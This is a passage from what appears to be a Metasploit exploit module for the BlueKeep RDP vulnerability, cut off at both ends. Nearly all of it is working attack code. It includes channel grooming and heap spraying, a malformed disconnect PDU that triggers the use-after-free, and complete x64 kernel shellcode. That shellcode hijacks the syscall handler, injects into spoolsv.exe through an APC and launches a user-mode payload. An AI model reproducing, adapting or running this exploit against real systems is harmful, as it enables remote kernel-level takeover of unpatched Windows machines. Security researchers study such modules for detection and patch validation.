\n'GROOMBASE' => 0xfffffa8102407000 \n} \n], \n[ \n'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X64], \n'GROOMBASE' => 0xfffffa8018c08000 \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 14 2019', \n'Notes' => \n{ \n'AKA' => ['Bluekeep'] \n} \n)) \n \nregister_advanced_options( \n[ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]), \nOptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]), \nOptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]), \n] \n) \nend \n \ndef exploit \nunless check == CheckCode::Vulnerable || datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'Set ForceExploit to override') \nend \n \nif target['FingerprintOnly'] \nfail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually') \nend \n \nbegin \nrdp_connect \nrescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError \nfail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service') \nend \n \nis_rdp, server_selected_proto = rdp_check_protocol \nunless is_rdp \nfail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service') \nend \n \n# We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us \n# from exploiting the target. \nif [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto) \nfail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.') \nend \n \nchans = [ \n['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP], \n[datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], \n[datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP], \n['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL], \n] \n \n@mst120_chan_id = 1004 + chans.length - 1 \n \nunless rdp_negotiate_security(chans, server_selected_proto) \nfail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.') \nend \n \nrdp_establish_session \n \nrdp_dispatch_loop \nend \n \nprivate \n \n# This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is \n# received on a channel, and this is when we need to kick off our exploit. \ndef rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data) \n# We have to do the default behaviour first. \nsuper(pkt, user, chan_id, flags, data) \n \ngroom_size = datastore['GROOMSIZE'] \npool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size) \ngroom_chan_count = datastore['GROOMCHANNELCOUNT'] \n \npayloads = create_payloads(pool_addr) \n \nprint_status(\"Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.\") \n \ntarget_channel_id = chan_id + 1 \n \nspray_buffer = create_exploit_channel_buffer(pool_addr) \nspray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF) \nfree_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80 \n \nprint_status(\"Surfing channels ...\") \nrdp_send(spray_channel * 1024) \nrdp_send(free_trigger) \n \nchan_surf_size = 0x421 \nspray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min \nchan_surf_packet = spray_channel * spray_packets \nchan_surf_count = chan_surf_size / spray_packets \n \nchan_surf_count.times do \nrdp_send(chan_surf_packet) \nend \n \nprint_status(\"Lobbing eggs ...\") \n \ngroom_mb = groom_size * 1024 / payloads.length \n \ngroom_mb.times do \ntpkts = '' \nfor c in 0..groom_chan_count \npayloads.each do |p| \ntpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF) \nend \nend \nrdp_send(tpkts) \nend \n \n# Terminating and disconnecting forces the USE \nprint_status(\"Forcing the USE of FREE'd object ...\") \nrdp_terminate \nrdp_disconnect \nend \n \n# Helper function to create the kernel mode payload and the usermode payload with \n# the egg hunter prefix. \ndef create_payloads(pool_address) \nbegin \n[kernel_mode_payload, user_mode_payload].map { |p| \n[ \npool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg \np \n].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, \"\\x00\") \n} \nrescue => ex \nprint_error(\"#{ex.backtrace.join(\"\\n\")}: #{ex.message} (#{ex.class})\") \nend \nend \n \ndef assemble_with_fixups(asm) \n# Rewrite all instructions of form 'lea reg, [rel label]' as relative \n# offsets for the instruction pointer, since metasm's 'ModRM' parser does \n# not grok that syntax. \nlea_rel = /lea+\\s(?<dest>\\w{2,3}),*\\s\\[rel+\\s(?<label>[a-zA-Z_].*)\\]/ \nasm.gsub!(lea_rel) do |match| \nmatch = \"lea #{$1}, [rip + #{$2}]\" \nend \n \n# metasm encodes all rep instructions as repnz \n# https://github.com/jjyg/metasm/pull/40 \nasm.gsub!(/rep+\\smovsb/, 'db 0xf3, 0xa4') \n \nencoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded \n \n# Fixup above rewritten instructions with the relative label offsets \nencoded.reloc.each do |offset, reloc| \ntarget = reloc.target.to_s \nif encoded.export.key?(target) \n# Note: this assumes the address we're fixing up is at the end of the \n# instruction. This holds for 'lea' but if there are other fixups \n# later, this might need to change to account for specific instruction \n# encodings \nif reloc.type == :i32 \ninstr_offset = offset + 4 \nelsif reloc.type == :i16 \ninstr_offset = offset + 2 \nend \nencoded.fixup(target => encoded.export[target] - instr_offset) \nelse \nraise \"Unknown symbol '#{target}' while resolving relative offsets\" \nend \nend \nencoded.fill \nencoded.data \nend \n \n# The user mode payload has two parts. The first is an egg hunter that searches for \n# the kernel mode payload. The second part is the actual payload that's invoked in \n# user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel \n# and user mode payloads around the heap in different packets because we don't have \n# enough space to put them both in the same chunk. Given that code exec can result in \n# landing on the user land payload, the egg is used to go to a kernel payload. \ndef user_mode_payload \n \nasm = %Q^ \n_start: \nlea rcx, [rel _start] \nmov r8, 0x#{KERNELMODE_EGG.to_s(16)} \n_egg_loop: \nsub rcx, 0x#{CHUNK_SIZE.to_s(16)} \nsub rax, 0x#{CHUNK_SIZE.to_s(16)} \nmov rdx, [rcx - 8] \ncmp rdx, r8 \njnz _egg_loop \njmp rcx \n^ \negg_loop = assemble_with_fixups(asm) \n \n# The USERMODE_EGG is required at the start as well, because the exploit code \n# assumes the tag is there, and jumps over it to find the shellcode. \n[ \nUSERMODE_EGG, \negg_loop, \nUSERMODE_EGG, \npayload.raw \n].pack('<Qa*<Qa*') \nend \n \ndef kernel_mode_payload \n \n# Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya \n# \n# This shellcode was written originally for eternalblue exploits \n# eternalblue_exploit7.py and eternalblue_exploit8.py \n# \n# Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0) \n# \n# Note: \n# - The userland shellcode is run in a new thread of system process. \n# If userland shellcode causes any exception, the system process get killed. \n# - On idle target with multiple core processors, the hijacked system call \n# might take a while (> 5 minutes) to get called because the system \n# call may be called on other processors. \n# - The shellcode does not allocate shadow stack if possible for minimal shellcode size. \n# This is ok because some Windows functions do not require a shadow stack. \n# - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed. \n# Note: the Windows 8 version macros are removed below \n# - The userland payload MUST be appened to this shellcode. \n# \n# References: \n# - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info) \n# - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c \n \ndata_kapc_offset = 0x10 \ndata_nt_kernel_addr_offset = 0x8 \ndata_origin_syscall_offset = 0 \ndata_peb_addr_offset = -0x10 \ndata_queueing_kapc_offset = -0x8 \nhal_heap_storage = 0xffffffffffd04100 \n \n# These hashes are not the same as the ones used by the \n# Block API so they have to be hard-coded. \ncreatethread_hash = 0x835e515e \nkeinitializeapc_hash = 0x6d195cc4 \nkeinsertqueueapc_hash = 0xafcc4634 \npsgetcurrentprocess_hash = 0xdbf47c78 \npsgetprocessid_hash = 0x170114e1 \npsgetprocessimagefilename_hash = 0x77645f3f \npsgetprocesspeb_hash = 0xb818b848 \npsgetthreadteb_hash = 0xcef84c3e \nspoolsv_exe_hash = 0x3ee083d8 \nzwallocatevirtualmemory_hash = 0x576e99ea \n \nasm = %Q^ \nshellcode_start: \nnop \nnop \nnop \nnop \n; IRQL is DISPATCH_LEVEL when got code execution \n \npush rbp \n \ncall set_rbp_data_address_fn \n \n; read current syscall \nmov ecx, 0xc0000082 \nrdmsr \n; do NOT replace saved original syscall address with hook syscall \nlea r9, [rel syscall_hook] \ncmp eax, r9d \nje _setup_syscall_hook_done \n \n; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize \ncmp dword [rbp+#{data_origin_syscall_offset}], eax \nje _hook_syscall \n \n; save original syscall \nmov dword [rbp+#{data_origin_syscall_offset}+4], edx \nmov dword [rbp+#{data_origin_syscall_offset}], eax \n \n; first time on the target \nmov byte [rbp+#{data_queueing_kapc_offset}], 0 \n \n_hook_syscall: \n; set a new syscall on running processor \n; setting MSR 0xc0000082 affects only running processor \nxchg r9, rax \npush rax \npop rdx ; mov rdx, rax \nshr rdx, 32 \nwrmsr \n \n_setup_syscall_hook_done: \npop rbp \n \n;--------------------- HACK crappy thread cleanup -------------------- \n; This code is effectively the same as the epilogue of the function that calls \n; the vulnerable function in the kernel, with a tweak or two. \n \n; TODO: make the lock not suck!! \nmov rax, qword [gs:0x188] \nadd word [rax+0x1C4], 1 ; KeGetCurrentThread()->KernelApcDisable++ \nlea r11, [rsp+0b8h] \nxor eax, eax \nmov rbx, [r11+30h] \nmov rbp, [r11+40h] \nmov rsi, [r11+48h] \nmov rsp, r11 \npop r15 \npop r14 \npop r13 \npop r12 \npop rdi \nret \n \n;--------------------- END HACK crappy thread cleanup \n \n;======================================================================== \n; Find memory address in HAL heap for using as data area \n; Return: rbp = data address \n;======================================================================== \nset_rbp_data_address_fn: \n; On idle target without user application, syscall on hijacked processor might not be called immediately. \n; Find some address to store the data, the data in this address MUST not be modified \n; when exploit is rerun before syscall is called \n;lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000] \n \n; ------ HACK rbp wasnt valid! \n \nmov rbp, #{hal_heap_storage} ; TODO: use some other buffer besides HAL heap?? \n \n; --------- HACK end rbp \n \n_set_rbp_data_address_fn_next: \n;shr rbp, 12 \n;shl rbp, 12 \n;sub rbp, 0x70 ; for KAPC struct too \nret \n \n;int 3 \n;call $+5 \n;pop r13 \nsyscall_hook: \nswapgs \nmov qword [gs:0x10], rsp \nmov rsp, qword [gs:0x1a8] \npush 0x2b \npush qword [gs:0x10] \n \npush rax ; want this stack space to store original syscall addr \n; save rax first to make this function continue to real syscall \npush rax \npush rbp ; save rbp here because rbp is special register for accessing this shellcode data \ncall set_rbp_data_address_fn \nmov rax, [rbp+#{data_origin_syscall_offset}] \nadd rax, 0x1f ; adjust syscall entry, so we do not need to reverse start of syscall handler \nmov [rsp+0x10], rax \n \n; save all volatile registers \npush rcx \npush rdx \npush r8 \npush r9 \npush r10 \npush r11 \n \n; use lock cmpxchg for queueing APC only one at a time \nxor eax, eax \nmov dl, 1 \nlock cmpxchg byte [rbp+#{data_queueing_kapc_offset}], dl \njnz _syscall_hook_done \n \n;====================================== \n; restore syscall \n;====================================== \n; an error after restoring syscall should never occur \nmov ecx, 0xc0000082 \nmov eax, [rbp+#{data_origin_syscall_offset}] \nmov edx, [rbp+#{data_origin_syscall_offset}+4] \nwrmsr \n \n; allow interrupts while executing shellcode \nsti \ncall r3_to_r0_start \ncli \n \n_syscall_hook_done: \npop r11 \npop r10 \npop r9 \npop r8 \npop rdx \npop rcx \npop rbp \npop rax \nret \n \nr3_to_r0_start: \n; save used non-volatile registers \npush r15 \npush r14 \npush rdi \npush rsi \npush rbx \npush rax ; align stack by 0x10 \n \n;====================================== \n; find nt kernel address \n;====================================== \nmov r15, qword [rbp+#{data_origin_syscall_offset}] ; KiSystemCall64 is an address in nt kernel \nshr r15, 0xc ; strip to page size \nshl r15, 0xc \n \n_x64_find_nt_walk_page: \nsub r15, 0x1000 ; walk along page size \ncmp word [r15], 0x5a4d ; 'MZ' header \njne _x64_find_nt_walk_page \n \n; save nt address for using in KernelApcRoutine \nmov [rbp+#{data_nt_kernel_addr_offset}], r15 \n \n;====================================== \n; get current EPROCESS and ETHREAD \n;====================================== \nmov r14, qword [gs:0x188] ; get _ETHREAD pointer from KPCR \nmov edi, #{psgetcurrentprocess_hash} \ncall win_api_direct \nxchg rcx, rax ; rcx = EPROCESS \n \n; r15 : nt kernel address \n; r14 : ETHREAD \n; rcx : EPROCESS \n \n;====================================== \n; find offset of EPROCESS.ImageFilename \n;====================================== \nmov edi, #{psgetprocessimagefilename_hash} \ncall get_proc_addr \nmov eax, dword [rax+3] ; get offset from code (offset of ImageFilename is always > 0x7f) \nmov ebx, eax ; ebx = offset of EPROCESS.ImageFilename \n \n \n;====================================== \n; find offset of EPROCESS.ThreadListHead \n;====================================== \n; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+) \n; if offset of ImageFilename is more than 0x400, current is (Win8+) \n \ncmp eax, 0x400 ; eax is still an offset of EPROCESS.ImageFilename \njb _find_eprocess_threadlist_offset_win7 \nadd eax, 0x10 \n_find_eprocess_threadlist_offset_win7: \nlea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead \n \n;====================================== \n; find offset of ETHREAD.ThreadListEntry \n;====================================== \n \nlea r8, [rcx+rdx] ; r8 = address of EPROCESS.ThreadListHead \nmov r9, r8 \n \n; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700 \n_find_ethread_threadlist_offset_loop: \nmov r9, qword [r9] \n \ncmp r8, r9 ; check end of list \nje _insert_queue_apc_done ; not found !!! \n \n; if (r9 - r14 < 0x700) found \nmov rax, r9 \nsub rax, r14 \ncmp rax, 0x700 \nja _find_ethread_threadlist_offset_loop \nsub r14, r9 ; r14 = -(offset of ETHREAD.ThreadListEntry) \n \n \n;====================================== \n; find offset of EPROCESS.ActiveProcessLinks \n;====================================== \nmov edi, #{psgetprocessid_hash} \ncall get_proc_addr \nmov edi, dword [rax+3] ; get offset from code (offset of UniqueProcessId is always > 0x7f) \nadd edi, 8 ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId) \n \n \n;====================================== \n; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock \n;====================================== \n; check process name \n \n \nxor eax, eax ; HACK to exit earlier if process not found \n \n_find_target_process_loop: \nlea rsi, [rcx+rbx] \n \npush rax \ncall calc_hash \ncmp eax, #{spoolsv_exe_hash} ; \"spoolsv.exe\" \npop rax \njz found_target_process \n \n;---------- HACK PROCESS NOT FOUND start ----------- \ninc rax \ncmp rax, 0x300 ; HACK not found! \njne _next_find_target_process \nxor ecx, ecx \n; clear queueing kapc flag, allow other hijacked system call to run shellcode \nmov byte [rbp+#{data_queueing_kapc_offset}], cl \n \njmp _r3_to_r0_done \n \n;---------- HACK PROCESS NOT FOUND end ----------- \n \n_next_find_target_process: \n; next process \nmov rcx, [rcx+rdi] \nsub rcx, rdi \njmp _find_target_process_loop \n \n \nfound_target_process: \n; The allocation for userland payload will be in KernelApcRoutine. \n; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess() \n \n;====================================== \n; save process PEB for finding CreateThread address in kernel KAPC routine \n;====================================== \nmov edi, #{psgetprocesspeb_hash} \n; rcx is EPROCESS. no need to set it. \ncall win_api_direct \nmov [rbp+#{data_peb_addr_offset}], rax \n \n \n;====================================== \n; iterate ThreadList until KeInsertQueueApc() success \n;====================================== \n; r15 = nt \n; r14 = -(offset of ETHREAD.ThreadListEntry) \n; rcx = EPROCESS \n; edx = offset of EPROCESS.ThreadListHead \n \n \nlea rsi, [rcx + rdx] ; rsi = ThreadListHead address \nmov rbx, rsi ; use rbx for iterating thread \n \n; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset. \n; Moreover, alertable thread need to be waiting state which is more difficult to check. \n; try queueing APC then check KAPC member is more reliable. \n \n_insert_queue_apc_loop: \n; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front \nmov rbx, [rbx+8] \n \ncmp rsi, rbx \nje _insert_queue_apc_loop ; skip list head \n \n; find start of ETHREAD address \n; set it to rdx to be used for KeInitializeApc() argument too \nlea rdx, [rbx + r14] ; ETHREAD \n \n; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer. \n; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL. \n; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer. \n; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL. \n; Teb member is next to Queue member. \nmov edi, #{psgetthreadteb_hash} \ncall get_proc_addr \nmov eax, dword [rax+3] ; get offset from code (offset of Teb is always > 0x7f) \ncmp qword [rdx+rax-8], 0 ; KTHREAD.Queue MUST not be NULL \nje _insert_queue_apc_loop \n \n; KeInitializeApc(PKAPC, \n; PKTHREAD, \n; KAPC_ENVIRONMENT = OriginalApcEnvironment (0), \n; PKKERNEL_ROUTINE = kernel_apc_routine, \n; PKRUNDOWN_ROUTINE = NULL, \n; PKNORMAL_ROUTINE = userland_shellcode, \n; KPROCESSOR_MODE = UserMode (1), \n; PVOID Context); \nlea rcx, [rbp+#{data_kapc_offset}] ; PAKC \nxor r8, r8 ; OriginalApcEnvironment \nlea r9, [rel kernel_kapc_routine] ; KernelApcRoutine \npush rbp ; context \npush 1 ; UserMode \npush rbp ; userland shellcode (MUST NOT be NULL) \npush r8 ; NULL \nsub rsp, 0x20 ; shadow stack \nmov edi, #{keinitializeapc_hash} \ncall win_api_direct \n; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later \n \n; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0); \n; SystemArgument1 is second argument in usermode code (rdx) \n; SystemArgument2 is third argument in usermode code (r8) \nlea rcx, [rbp+#{data_kapc_offset}] \n;xor edx, edx ; no need to set it here \n;xor r8, r8 ; no need to set it here \nxor r9, r9 \nmov edi, #{keinsertqueueapc_hash} \ncall win_api_direct \nadd rsp, 0x40 \n; if insertion failed, try next thread \ntest eax, eax \njz _insert_queue_apc_loop \n \nmov rax, [rbp+#{data_kapc_offset}+0x10] ; get KAPC.ApcListEntry \n; EPROCESS pointer 8 bytes \n; InProgressFlags 1 byte \n; KernelApcPending 1 byte \n; if success, UserApcPending MUST be 1 \ncmp byte [rax+0x1a], 1 \nje _insert_queue_apc_done \n \n; manual remove list without lock \nmov [rax], rax \nmov [rax+8], rax \njmp _insert_queue_apc_loop \n \n_insert_queue_apc_done: \n; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine. \n \n_r3_to_r0_done: \npop rax \npop rbx \npop rsi \npop rdi \npop r14 \npop r15 \nret \n \n;======================================================================== \n; Call function in specific module \n; \n; All function arguments are passed as calling normal function with extra register arguments \n; Extra Arguments: r15 = module pointer \n; edi = hash of target function name \n;======================================================================== \nwin_api_direct: \ncall get_proc_addr \njmp rax \n \n \n;======================================================================== \n; Get function address in specific module \n; \n; Arguments: r15 = module pointer \n; edi = hash of target function name \n; Return: eax = offset \n;======================================================================== \nget_proc_addr: \n; Save registers \npush rbx \npush rcx \npush rsi ; for using calc_hash \n \n; use rax to find EAT \nmov eax, dword [r15+60] ; Get PE header e_lfanew \nmov eax, dword [r15+rax+136] ; Get export tables RVA \n \nadd rax, r15 \npush rax ; save EAT \n \nmov ecx, dword [rax+24] ; NumberOfFunctions \nmov ebx, dword [rax+32] ; FunctionNames \nadd rbx, r15 \n \n_get_proc_addr_get_next_func: \n; When we reach the start of the EAT (we search backwards), we hang or crash \ndec ecx ; decrement NumberOfFunctions \nmov esi, dword [rbx+rcx*4] ; Get rva of next module name \nadd rsi, r15 ; Add the modules base address \n \ncall calc_hash \n \ncmp eax, edi ; Compare the hashes \njnz _get_proc_addr_get_next_func ; try the next function \n \n_get_proc_addr_finish: \npop rax ; restore EAT \nmov ebx, dword [rax+36] \nadd rbx, r15 ; ordinate table virtual address \nmov cx, word [rbx+rcx*2] ; desired functions ordinal \nmov ebx, dword [rax+28] ; Get the function addresses table rva \nadd rbx, r15 ; Add the modules base address \nmov eax, dword [rbx+rcx*4] ; Get the desired functions RVA \nadd rax, r15 ; Add the modules base address to get the functions actual VA \n \npop rsi \npop rcx \npop rbx \nret \n \n;======================================================================== \n; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode. \n; \n; Argument: rsi = string to hash \n; Clobber: rsi \n; Return: eax = hash \n;======================================================================== \ncalc_hash: \npush rdx \nxor eax, eax \ncdq \n_calc_hash_loop: \nlodsb ; Read in the next byte of the ASCII string \nror edx, 13 ; Rotate right our hash value \nadd edx, eax ; Add the next byte of the string \ntest eax, eax ; Stop when found NULL \njne _calc_hash_loop \nxchg edx, eax \npop rdx \nret \n \n \n; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context. \n; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery(). \n; Moreover, there is no lock when calling KernelApcRoutine. \n; So KernelApcRoutine can simply lower the IRQL by setting cr8 register. \n; \n; VOID KernelApcRoutine( \n; IN PKAPC Apc, \n; IN PKNORMAL_ROUTINE *NormalRoutine, \n; IN PVOID *NormalContext, \n; IN PVOID *SystemArgument1, \n; IN PVOID *SystemArgument2) \nkernel_kapc_routine: \npush rbp \npush rbx \npush rdi \npush rsi \npush r15 \n \nmov rbp, [r8] ; *NormalContext is our data area pointer \n \nmov r15, [rbp+#{data_nt_kernel_addr_offset}] \npush rdx \npop rsi ; mov rsi, rdx \nmov rbx, r9 \n \n;====================================== \n; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40) \n;====================================== \nxor eax, eax \nmov cr8, rax ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires) \n; rdx is already address of baseAddr \nmov [rdx], rax ; baseAddr = 0 \nmov ecx, eax \nnot rcx ; ProcessHandle = -1 \nmov r8, rax ; ZeroBits \nmov al, 0x40 ; eax = 0x40 \npush rax ; PAGE_EXECUTE_READWRITE = 0x40 \nshl eax, 6 ; eax = 0x40 << 6 = 0x1000 \npush rax ; MEM_COMMIT = 0x1000 \n; reuse r9 for address of RegionSize \nmov [r9], rax ; RegionSize = 0x1000 \nsub rsp, 0x20 ; shadow stack \nmov edi, #{zwallocatevirtualmemory_hash} \ncall win_api_direct \nadd rsp, 0x30 \n \n; check error \ntest eax, eax \njnz _kernel_kapc_routine_exit \n \n;====================================== \n; copy userland payload \n;====================================== \nmov rdi, [rsi] \n \n;--------------------------- HACK IN EGG USER --------- \n \npush rdi \n \nlea rsi, [rel shellcode_start] \nmov rdi, 0x#{USERMODE_EGG.to_s(16)} \n \n_find_user_egg_loop: \nsub rsi, 0x#{CHUNK_SIZE.to_s(16)} \nmov rax, [rsi - 8] \ncmp rax, rdi \njnz _find_user_egg_loop \n \n_inner_find_user_egg_loop: \ninc rsi \nmov rax, [rsi - 8] \ncmp rax, rdi \njnz _inner_find_user_egg_loop \n \npop rdi \n;--------------------------- END HACK EGG USER ------------ \n \nmov ecx, 0x380 ; fix payload size to 0x380 bytes \n \nrep movsb \n \n;====================================== \n; find CreateThread address (in kernel32.dll) \n;====================================== \nmov rax, [rbp+#{data_peb_addr_offset}] \nmov rax, [rax + 0x18] ; PEB->Ldr \nmov rax, [rax + 0x20] ; InMemoryOrder list \n \n;lea rsi, [rcx + rdx] ; rsi = ThreadListHead address \n;mov rbx, rsi ; use rbx for iterating thread \n_find_kernel32_dll_loop: \nmov rax, [rax] ; first one always be executable \n; offset 0x38 (WORD) => must be 0x40 (full name len c:\\windows\\system32\\kernel32.dll) \n; offset 0x48 (WORD) => must be 0x18 (name len kernel32.dll) \n; offset 0x50 => is name \n; offset 0x20 => is dllbase \n;cmp word [rax+0x38], 0x40 \n;jne _find_kernel32_dll_loop \ncmp word [rax+0x48], 0x18 \njne _find_kernel32_dll_loop \n \nmov rdx, [rax+0x50] \n; check only \"32\" because name might be lowercase or uppercase \ncmp dword [rdx+0xc], 0x00320033 ; 3\\x002\\x00 \njnz _find_kernel32_dll_loop \n \n;int3 \nmov r15, [rax+0x20] \nmov edi, #{createthread_hash} \ncall get_proc_addr \n \n; save CreateThread address to SystemArgument1 \nmov [rbx], rax \n \n_kernel_kapc_routine_exit: \nxor ecx, ecx \n; clear queueing kapc flag, allow other hijacked system call to run shellcode \nmov byte [rbp+#{data_queueing_kapc_offset}], cl \n; restore IRQL to APC_LEVEL \nmov cl, 1 \nmov cr8, rcx \n \npop r15 \npop rsi \npop rdi \npop rbx \npop rbp \nret \n \nuserland_start_thread: \n; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL) \nxchg rdx, rax ; rdx is CreateThread address passed from kernel \nxor ecx, ecx ; lpThreadAttributes = NULL \npush rcx ; lpThreadId = NULL \npush rcx ; dwCreationFlags = 0 \nmov r9, rcx ; lpParameter = NULL \nlea r8, [rel userland_payload] ; lpStartAddr \nmov edx, ecx ; dwStackSize = 0 \nsub rsp, 0x20 \ncall rax \nadd rsp, 0x30 \nret \n \nuserland_payload: \n^ \n \n[ \nKERNELMODE_EGG, \nassemble_with_fixups(asm) \n].pack('<Qa*') \nend \n \ndef create_free_trigger(chan_user_id, chan_id) \n# malformed Disconnect Provider Indication PDU (opcode: 0x2, total_size != 0x20) \nvprint_status(\"Creating free trigger for user #{chan_user_id} on channel #{chan_id}\") \n# The extra bytes on the end of the body is what causes the bad things to happen \nbody = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\" + \"\\x00\" * 22 \nrdp_create_channel_msg(chan_user_id, chan_id, body, 3, 0xFFFFFFF) \nend \n \ndef create_exploit_channel_buffer(target_addr) \noverspray_addr = target_addr + 0x2000 \nshellcode_vtbl = target_addr + HEADER_SIZE \nmagic_value1 = overspray_addr + 0x810 \nmagic_value2 = overspray_addr + 0x48 \nmagic_value3 = overspray_addr + CHUNK_SIZE + HEADER_SIZE \n \n# first 0x38 bytes are used by DATA PDU packet \n# exploit channel starts at +0x38, which is +0x20 of an _ERESOURCE \n# http://www.tssc.de/winint/Win10_17134_ntoskrnl/_ERESOURCE.htm \n[ \n[ \n# SystemResourceList (2 pointers, each 8 bytes) \n# Pointer to OWNER_ENTRY (8 bytes) \n# ActiveCount (SHORT, 2 bytes) \n# Flag (WORD, 2 bytes) \n# Padding (BYTE[4], 4 bytes) x64 only \n0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes) \n0x0, # ExclusiveWaiters (Pointer to KSEVENT, 8 bytes) \nmagic_value2, # OwnerThread (ULONG, 8 bytes) \nmagic_value2, # TableSize (ULONG, 8 bytes) \n0x0, # ActiveEntries (DWORD, 4 bytes) \n0x0, # ContenttionCount (DWORD, 4 bytes) \n0x0, # NumberOfSharedWaiters (DWORD, 4 bytes) \n0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes) \n0x0, # Reserved2 (PVOID, 8 bytes) x64 only \nmagic_value2, # Address (PVOID, 8 bytes) \n0x0, # SpinLock (UINT_PTR, 8 bytes) \n].pack('<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'), \n[ \nmagic_value2, # SystemResourceList (2 pointers, each 8 bytes) \nmagic_value2, # -------------------- \n0x0, # Pointer to OWNER_ENTRY (8 bytes) \n0x0, # ActiveCount (SHORT, 2 bytes) \n0x0, # Flag (WORD, 2 bytes) \n0x0, # Padding (BYTE[4], 4 bytes) x64 only \n0x0, # SharedWaters (Pointer to KSEMAPHORE, 8 bytes) \n0x0, # ExclusiveWaiters (Pointer to 